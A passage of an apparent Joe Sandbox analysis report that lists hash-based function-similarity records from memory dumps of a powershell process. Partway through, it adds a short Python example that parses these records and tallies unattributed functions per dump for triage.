                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ffc9fe6abe3c0a6eb339a60bff329ce1c23d7de28d7ef5dedb56ed3829f42d63
                                                                                                                                                                                                                          • Instruction ID: 0550770a08ea2ac65bdd92a84eff8090b75d9567243c4d658236d78a652b8142
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffc9fe6abe3c0a6eb339a60bff329ce1c23d7de28d7ef5dedb56ed3829f42d63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D141F3F1A11202DFCF208F14D511AAA77B39FCA210F1884A6D9129F791DB31DD44CBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 622bd563067a7f9c691d7744db244495ae43437958a1f75726baf352d2842c37
                                                                                                                                                                                                                          • Instruction ID: a1dbee64f99b33d8c3b4144a41c2fe79e45e257668048ac3be7ba1631bdc0c22
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 622bd563067a7f9c691d7744db244495ae43437958a1f75726baf352d2842c37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28411B34B142058FDB19DFA5C458AAEBBF2EB8D711F145099E406AB392DF35EC01CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0b418de0520f51010da95821b75530b3bc825d6133d8a9ce72efb8103d59af9e
                                                                                                                                                                                                                          • Instruction ID: c7940a788157bebfc0a8d36ad3ef2e734270d7d2d57754b873036ce5b59fd7d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b418de0520f51010da95821b75530b3bc825d6133d8a9ce72efb8103d59af9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7412874A005058FCB09CF5AC5D8ABAF7B6FF88310B258599D819AB364C736FC51CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ae8177cc6c55f0f7ede69a8ec18f0b538ff34868422c2b01d23f26d03a5ff2fe
                                                                                                                                                                                                                          • Instruction ID: 5f497b0d742e6102d3bbcc8dafc0cf6ea81d89edf931103bb97093becef7d385
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae8177cc6c55f0f7ede69a8ec18f0b538ff34868422c2b01d23f26d03a5ff2fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D731BE313003019FD705DB79D840BAABBA2EFD4256F048679DA09CB355DF71A815CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d93bab78081c025f5ae9168d95a3ba779598c47bd5eefd557a5b6621e07d74b7
                                                                                                                                                                                                                          • Instruction ID: d03a4cbea33ded2c7bb1de916d75a1a5f1ee5aaccb17014ca1165a0f54b65e49
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d93bab78081c025f5ae9168d95a3ba779598c47bd5eefd557a5b6621e07d74b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4315E70A002099BDB04DF7AC4946BEBBFAEFC8611F148069E505EB254EB34AC418BA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fe66114cd5f01e86f5dc2c83e94104e90fc227050cda744e868ebf623048b9ef
                                                                                                                                                                                                                          • Instruction ID: 936b28489149d42afe93bae7777ccdab88b5166d2b8072246d968504fcd67e04
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe66114cd5f01e86f5dc2c83e94104e90fc227050cda744e868ebf623048b9ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC311C34B142458FDB14DFA5C458ABEBBF1EB8D311F1890A8D446AB352DB35EC01DB60
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3f10ea57fc43bb5b093a87dda8dfb82ec033bc6ba2fa8899502e6ca5a2e33a95
                                                                                                                                                                                                                          • Instruction ID: 1611e98cb928a3e208032f48808efa1dc2f6ca3a48b1925db96d9b5b9073ef36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f10ea57fc43bb5b093a87dda8dfb82ec033bc6ba2fa8899502e6ca5a2e33a95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5731B2B0A003099FEB05DBA5D894ABF7BB6EFC4301F1584A9C510AB391CB39AD01CB61
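Every record in this stretch of the report comes from the powershell child (process 0000000A), from non-PE-backed dumps at 04BE0000 and 07AD0000, and carries empty API ID, String ID and API String ID fields, so nothing in the report ties these functions to an import or a string. A practical triage step is to parse the records and tally, per memory dump, how many functions remain unattributed and whether any record is internally inconsistent (a truncated record, or an Opcode ID that differs from its Opcode Fuzzy Hash, which are identical on every complete record here). The Python below is an added example, not Joe Sandbox's or this report's own code: it parses the record format shown above using three records copied from this page as its input, and assumes that in the dotted dump file name the first field is the process index and the fourth the base address (an assumption that agrees with the Offset value on every record on this page).

```python
# Added example (not Joe Sandbox's code): parse "Memory Dump Source" function
# records from a Joe Sandbox report and summarise them per memory dump.
import re
from collections import defaultdict

# Three records copied from this report (powershell process 0000000A); the
# last one is truncated exactly as it appears on the page.
SAMPLE = """\
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 879bb8a77c852c448aecb154e8929bdfad8922628c6b20f12707bbdd80bdb88b
• Instruction ID: 8c2431e4fb726c0b6b0f5726ec7e93f89574fc560b542255b29b216dc78814e3
• Opcode Fuzzy Hash: 879bb8a77c852c448aecb154e8929bdfad8922628c6b20f12707bbdd80bdb88b
• Instruction Fuzzy Hash: DE512971E052499FDB14DFAAC484B9DFBF5FF88310F14816AE819AB354EB34A845CB60
Memory Dump Source
• Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ffc9fe6abe3c0a6eb339a60bff329ce1c23d7de28d7ef5dedb56ed3829f42d63
• Instruction ID: 0550770a08ea2ac65bdd92a84eff8090b75d9567243c4d658236d78a652b8142
• Opcode Fuzzy Hash: ffc9fe6abe3c0a6eb339a60bff329ce1c23d7de28d7ef5dedb56ed3829f42d63
• Instruction Fuzzy Hash: D141F3F1A11202DFCF208F14D511AAA77B39FCA210F1884A6D9129F791DB31DD44CBA2
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7aa071d2e59a6a34672db680ef3d50c5dc1f67bfd0a7be8ae5479f6349c87cca
"""

REQUIRED = ("Source File", "Snapshot File", "API ID", "String ID", "API String ID",
            "Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)$")


def parse_records(text):
    """Split report text into one dict per 'Memory Dump Source' block."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            records.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur[m.group(1).strip()] = m.group(2).strip()
    return records


def parse_source(value):
    """Decode a Source File value. Assumption: in the dotted dump name the first
    field is the process index and the fourth the base address."""
    m = SOURCE_RE.match(value)
    if m is None:
        raise ValueError("unexpected Source File format: %r" % value)
    parts = m["file"][: -len(".sdmp")].split(".")
    return {"process": parts[0], "base": int(parts[3], 16),
            "offset": int(m["off"], 16), "pe_backed": m["pe"] == "true"}


def check_record(rec):
    """Return a list of problems; an empty list means the record is consistent."""
    problems = ["missing field " + k for k in REQUIRED if k not in rec]
    if "Opcode Fuzzy Hash" in rec and rec.get("Opcode ID") != rec["Opcode Fuzzy Hash"]:
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    if "Source File" in rec and parse_source(rec["Source File"])["base"] != \
            parse_source(rec["Source File"])["offset"]:
        problems.append("dump base does not match Offset")
    return problems


def summarize(records):
    """Per dump (process:base): function count and how many have no API or
    string attribution at all."""
    out = defaultdict(lambda: {"functions": 0, "unattributed": 0, "pe_backed": None})
    for rec in records:
        if "Source File" not in rec:
            continue
        src = parse_source(rec["Source File"])
        key = "%s:%08X" % (src["process"], src["base"])
        out[key]["functions"] += 1
        out[key]["pe_backed"] = src["pe_backed"]
        if not (rec.get("API ID") or rec.get("String ID") or rec.get("API String ID")):
            out[key]["unattributed"] += 1
    return dict(out)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, r in enumerate(recs):
        print(i, check_record(r) or "ok")
    print(summarize(recs))
```

Run against the full report text rather than the embedded sample, the summary shows at a glance which dumps of the powershell process consist entirely of functions the similarity engine could not attribute, which are the regions worth opening in the `.jbxd` snapshot by hand.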
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7aa071d2e59a6a34672db680ef3d50c5dc1f67bfd0a7be8ae5479f6349c87cca
                                                                                                                                                                                                                          • Instruction ID: b84438475badce53c22fa52ec3751b0be9afd3d618f2d82d3424b5bbe27e1576
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa071d2e59a6a34672db680ef3d50c5dc1f67bfd0a7be8ae5479f6349c87cca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA316E70A002058FCB14DF7AD454AAEBBF6FF89214F14846AD406EB391DB75AC81CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b1f18a73a25eed3f2762820ce7e76373e7962c000d6fb99ca0a3893a22982291
                                                                                                                                                                                                                          • Instruction ID: 8d71f4f29894c7cd04211de80735f8b26bca99599a8589d260fea73c21f69921
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1f18a73a25eed3f2762820ce7e76373e7962c000d6fb99ca0a3893a22982291
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C312B70A002099FDB05DFAAD4947BEBAFAEFC8710F148069E505E7354EB349C418BA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b42947f241f0f8155b5a819965f13425e1ccfd159cad88d398bced8b50fa7fdb
                                                                                                                                                                                                                          • Instruction ID: 8983efc4c40101448daa9c2ebf4f94ba529b89527c187b945e14c6f7655e29ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b42947f241f0f8155b5a819965f13425e1ccfd159cad88d398bced8b50fa7fdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9221A371A042488FDB14DBAAD4407AEBBF5EFC9720F14846AD509E7340CB75A9058BE5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 411655c56ae26334854bd3c72435048a17790a35196fa4292a0257465e578ee5
                                                                                                                                                                                                                          • Instruction ID: 6486dbc4fc0ad7194726d8203c9525135aece0f153b1714ce28728bb0ac0609e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 411655c56ae26334854bd3c72435048a17790a35196fa4292a0257465e578ee5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8319EB19053849EEB60CF6EC08879AFFF2EFC9310F2884ADD4499B245D775A445CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8578a8b5d10517b85ad3d468800b927ecbe947d56121282ebcf7f801a2d8c6f9
                                                                                                                                                                                                                          • Instruction ID: 6c196a28053e989c846bf417a98e84478003f15532500e7f3e478cd16aa6553c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8578a8b5d10517b85ad3d468800b927ecbe947d56121282ebcf7f801a2d8c6f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA3161B4A002099FEB04DFA5D494ABFB7B2EFC8305F1184A9C611AB394DB35AD018F50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cb5bb46070de0af2b574dec3f0eb8acb63ec44692cb07d9371f8cbb362c5d1dd
                                                                                                                                                                                                                          • Instruction ID: cf161fe79065da630b229033518c5db30ca8ded3328ba262331348df4a0a9937
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb5bb46070de0af2b574dec3f0eb8acb63ec44692cb07d9371f8cbb362c5d1dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46311C70A002048FCB14DF7AD4586AEBBF6FF89215F14856AD406EB391DF75AC41CB60
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1595525830.0000000004B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B3D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4b3d000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 725350890b62f6b7add5ae73626563ea0959b3a37b9472a6366f6c28f5db44d2
                                                                                                                                                                                                                          • Instruction ID: 7bea8339f72981310b3b84c1f5b6eb8d262447d556487e70e4cb31aa0fb6f61a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 725350890b62f6b7add5ae73626563ea0959b3a37b9472a6366f6c28f5db44d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8212476A04300EFDF05DF14D9C0B26BB61FB88315F20C5EDE9490A256C736E856CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1595525830.0000000004B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B3D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4b3d000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d13a48ed1cc0f3d7dda83ad1988c400b5085e5ef0770c6b69a250960d2e3e908
                                                                                                                                                                                                                          • Instruction ID: 1cee52cc64a139f43140e17763b307aa39b5cb958bfac4ac2b7a66702be2dc98
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d13a48ed1cc0f3d7dda83ad1988c400b5085e5ef0770c6b69a250960d2e3e908
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC213775A04304DFDB10DF28D9C4B26BB61FB84325F20C5ADDA094B246C336E846CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: db4d19d4753c7a7cf83c13f5ec9fe792f6e499862e66242013625ef31e086eb8
                                                                                                                                                                                                                          • Instruction ID: 427b1c4aaeacbc067851350d3b65459a824b3d59c2b132994acafb7a9540be6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db4d19d4753c7a7cf83c13f5ec9fe792f6e499862e66242013625ef31e086eb8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D2159B09057449EEB60CF6AC48839AFBF6EF88310F28C45ED81D97245D77464858B61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc132d46e63e4bb4d30498b4e3558fe59ac06d029a2566791c8b4dffe5a6f873
• Instruction ID: b8e6e8ca1551bf89675c73195e747d7cf5b41f8110ad92e6e3823adba8201d45
• Opcode Fuzzy Hash: dc132d46e63e4bb4d30498b4e3558fe59ac06d029a2566791c8b4dffe5a6f873
• Instruction Fuzzy Hash: 0E113830A045499FCF15CE76D4484FCBB79EFD9392B1484EAC801DB306DBB1A812D7A0
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8baa35f7245f49443eac584c5f9cb5f9dc1e37f3141bd90dd51caa5ef7bf9649
• Instruction ID: 2017eb6ff2d0ac674e3a3590737e02fefa5ccb56b0b07c66f18375da489d5261
• Opcode Fuzzy Hash: 8baa35f7245f49443eac584c5f9cb5f9dc1e37f3141bd90dd51caa5ef7bf9649
• Instruction Fuzzy Hash: 14112B367001188FDB04EBA9E840AEE77F6EBCC726B0440A4E909DB351DF34ED118BA0
Memory Dump Source
• Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f8c2e4dc43a7b663e74d7d6296d3e41824db2374a6d982b639ffef74bd8d2cd
• Instruction ID: 97eee9ad5b6de72f21130e3a13cbe5b54df3389de716a2f6021ca56838179dbc
• Opcode Fuzzy Hash: 5f8c2e4dc43a7b663e74d7d6296d3e41824db2374a6d982b639ffef74bd8d2cd
• Instruction Fuzzy Hash: 6D11E4F1A0024ADFCB10DF59C584BAABBF2EF85310F0680ABE52A9B122D334DD55CB51
Memory Dump Source
• Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eac7dd11fe9e9ac93c37fa384156b8ad5aac09a33921eb0238dd929f355b64dc
• Instruction ID: bb2f6688a9b67abd032a5878e82a439ec04e68c27e9b52c6092f9cba25bddca1
• Opcode Fuzzy Hash: eac7dd11fe9e9ac93c37fa384156b8ad5aac09a33921eb0238dd929f355b64dc
• Instruction Fuzzy Hash: 9111C4F1A0020ADFCB10DF59C585B66B7F2EB85211F4681B6E52A97222D730DD41CB91
Memory Dump Source
• Source File: 0000000A.00000002.1595525830.0000000004B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4b3d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
• Instruction ID: 6d32c88373f108769b9d075b2444eb564dfd4e4f765ee2aaa01d61229cc269ca
• Opcode Fuzzy Hash: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
• Instruction Fuzzy Hash: D1218C76904240DFCB06CF14D9C4B26BF72FB88314F24C5A9D9494A656C33AE46ACB91
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff44c010a9d93c60b2f0428c357a5887faceeb4665c8c3dbff80ce4b0bb6d4c2
• Instruction ID: f553ff1afd23c753316113af8ecd680af9ed59f5a17107547b72bab2163d9114
• Opcode Fuzzy Hash: ff44c010a9d93c60b2f0428c357a5887faceeb4665c8c3dbff80ce4b0bb6d4c2
• Instruction Fuzzy Hash: 1F118E316083448FDB25DB76D594A6A7BE1EF85210F5484EED04EC76A2DB21F845D700
Memory Dump Source
• Source File: 0000000A.00000002.1595525830.0000000004B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4b3d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
• Instruction ID: a18d70ec91d12d1bed57d3d1bda11e77b85afcc8765d1f229766b6dad06107f3
• Opcode Fuzzy Hash: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
• Instruction Fuzzy Hash: 4A11D079904280CFCB11CF24D5C0B25BF61FB44325F24C6AED9494B656C33AE44ACB51
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 31fa446208502f4d1926823e8ec418de512b421f5b7d98c77968e4781c1bfd47
• Instruction ID: 0286676e2b72aee3408a9750a9476a2102544c6b3f39039deebd014340707c5e
• Opcode Fuzzy Hash: 31fa446208502f4d1926823e8ec418de512b421f5b7d98c77968e4781c1bfd47
• Instruction Fuzzy Hash: CD11F7342047508FC728DF79D4548A6B7F6EF8921576489ADD44A8BBA1CB32E846CB50
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c07abab7c6acfffed1ead2bc727912ec936a0abfbce199e1bd912902e3bc8bf
• Instruction ID: 4a7c119219b2f66f91ec2e63be93a77a2dafd7af177d3a4c305e29af956f1908
• Opcode Fuzzy Hash: 4c07abab7c6acfffed1ead2bc727912ec936a0abfbce199e1bd912902e3bc8bf
• Instruction Fuzzy Hash: 680140357002149FCB159F74E8086AEFBF5FB88359B14856DE51AD3242DB31A911CB91
Memory Dump Source
• Source File: 0000000A.00000002.1595525830.0000000004B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4b3d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 746c4ac2e5ea6e6acaae39aae27442c5b2a2698f80a82da19a8b4f0abb74f107
• Instruction ID: 0a6e47c2127650f4b063052b28291bf04a34fa54ab7ccbe27a6c26372e29190b
• Opcode Fuzzy Hash: 746c4ac2e5ea6e6acaae39aae27442c5b2a2698f80a82da19a8b4f0abb74f107
• Instruction Fuzzy Hash: 8301527240D3C45FD7124B259C94752BFB8DF53625F1981DBD9888F293C2686C45C772
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 63d9ecb817b09ab14dbd68fed2de4f32ef6b950d0700eff73f482c5826b9a6a3
• Instruction ID: e3b9851ae1a05e10d98ecd763ef3cd93e13a39c58fb612168208b901ee305e63
